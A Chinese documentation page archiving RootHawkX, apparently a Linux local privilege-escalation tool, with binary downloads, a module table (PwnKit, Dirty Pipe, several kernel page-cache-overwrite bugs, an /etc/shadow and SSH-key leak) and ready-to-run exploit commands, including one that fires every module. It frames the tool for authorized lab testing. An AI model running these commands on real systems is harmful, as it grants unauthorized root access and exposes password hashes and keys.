跳到主要内容

RootHawkX Linux本地提权工具

作者修订时间
wjlin02026-08-28 19:22:45

前言

RootHawkX 是一个 Linux 本地安全测试终端工具,使用 Go 编写,面向授权靶机、虚拟机和实验环境。该项目基于 RootHawk 修改,并集成了更多 Linux 本地提权漏洞利用模块。

本文将它归档到:

渗透测试 -> 内网渗透 -> Linux提权 -> 本地提权工具

工具仅用于授权安全测试、靶场复现和漏洞验证。不要在未授权系统上运行本工具。

工具信息

项目内容
工具名称RootHawkX
上游仓库DeEpinGh0st/RootHawkX
当前归档版本v1.1
Release 地址RootHawkX v1.1
发布时间2026-06-30
主要语言Go / C
工具类型Linux 本地提权检测与利用工具

本地归档下载

为避免上游仓库变动、Release 删除或网络不可用,本站已保存 v1.1 的源码包和全部 Release 架构二进制。

源码

文件下载SHA256
RootHawkX-v1.1.zip下载a740a8131fc8ee609a18f64c11913bb1728d116537a2011e83d4ca86ecc9af26
RootHawkX-v1.1.tar.gz下载c2f89356d8b636fe6690056effa61757fc5cf1c05f70797f60f50654c3e65b6d

可执行文件

文件架构下载SHA256
roothawkx_linux_386linux/386下载9b52eaa757c97ee792970bebf26bba2b18448c9bdd42b1fac170180c71aa28d2
roothawkx_linux_amd64linux/amd64下载e183c0ac8688a7285164ef31d16ab4eaa44bbf52c36b104157f915cb1e8f9179
roothawkx_linux_arm64linux/arm64下载de5fa1b971947194e8cbcc281c980c899f86aade6c4d5fa1063570086a2d67f1

校验文件:

本地校验命令:

shasum -a 256 roothawkx_linux_amd64

如果已经下载完整归档目录,可以使用:

cd static/tools/roothawkx/v1.1
shasum -a 256 -c SHA256SUMS.txt

使用方法

下载对应架构的文件后,先添加执行权限:

chmod +x roothawkx_linux_amd64

查看帮助:

./roothawkx_linux_amd64 -help

查看模块列表:

./roothawkx_linux_amd64 -list

执行指定模块:

./roothawkx_linux_amd64 -e CVE-2022-0847

按顺序执行全部模块:

./roothawkx_linux_amd64 -any

参数说明

参数说明
-list显示当前集成的 CVE 模块
-e执行指定 CVE 或别名
-any按列表顺序执行全部模块
-pk指定 CVE-2021-4034 使用的 pkexec 路径,默认 /usr/bin/pkexec
-backupCVE-2026-31431 执行前备份 su 到指定路径
-execCVE-2026-31431 提权后执行指定程序,而不是进入 su
-target指定执行目标功能,例如 CVE-2026-46333 的 keyshadow
-v尽量输出详细日志
-help显示帮助

集成模块

CVE 编号常见名称 / 别名类型 / 组件
CVE-2026-31431Copy FailLinux Kernel 本地提权,涉及 crypto / AF_ALG / algif_aead 相关逻辑问题
CVE-2026-43284Dirty Frag / CopyFail2Linux Kernel 本地提权,涉及 xfrm/esp、shared skb frags 等内核网络处理路径
CVE-2026-43503DirtyCloneLinux Kernel 本地提权,利用 net/skbuff 共享分片克隆漏洞
CVE-2026-46300FragnesiaLinux Kernel 本地提权,利用 XFRM ESP-in-TCP 子系统逻辑问题,通过 page cache 覆写 /usr/bin/su 获取 root shell
CVE-2026-46331COW / PeditLinux Kernel 本地提权,利用 net/sched act_pedit 漏洞覆写内核脏数据
CVE-2026-46333ssh-keysign-pwnLinux 内核进程退出路径竞态条件,允许信息泄露,支持 -target shadow-target key
CVE-2026-43494PinTheftLinux Kernel 本地提权,利用 RDS zerocopy double-free 与 io_uring page cache overwrite
dirtydecryptDirtyDecrypt / DirtyCBCLinux Kernel 本地提权,利用 rxgk_decrypt_skb() 缺少 COW 保护导致 page cache 写入
CVE-2021-4034PwnKitPolkit pkexec 本地提权漏洞
CVE-2021-3560Polkit Authentication BypassPolkit D-Bus 权限绕过
CVE-2022-0847Dirty PipeLinux Kernel 管道机制相关本地提权漏洞

示例命令

./roothawkx_linux_amd64 -list
./roothawkx_linux_amd64 -e CVE-2021-4034
./roothawkx_linux_amd64 -e CVE-2021-4034 -pk /usr/bin/pkexec
./roothawkx_linux_amd64 -e CVE-2026-31431 -backup /tmp/su.bak
./roothawkx_linux_amd64 -e CVE-2026-31431 -backup /tmp/su.bak -exec /tmp/root-task
./roothawkx_linux_amd64 -e CVE-2026-43284 -v
./roothawkx_linux_amd64 -e CVE-2026-46300
./roothawkx_linux_amd64 -e fragnesia -v
./roothawkx_linux_amd64 -e pintheft
./roothawkx_linux_amd64 -e dirtydecrypt
./roothawkx_linux_amd64 -e dirtyclone
./roothawkx_linux_amd64 -e cow
./roothawkx_linux_amd64 -e keysign -target shadow
./roothawkx_linux_amd64 -any

使用注意

  • 只在授权环境、靶场、虚拟机或自有测试机上运行。
  • 涉及 /usr/bin/supkexec、page cache 覆写等模块时,优先使用快照环境测试。
  • 执行前记录系统版本、内核版本和工具哈希,便于复现和回滚。
  • 不建议在生产系统上直接运行 -any,应先通过 -list 和系统版本筛选目标模块。
  • 如果模块提供 -backup 参数,优先指定备份路径。

参考链接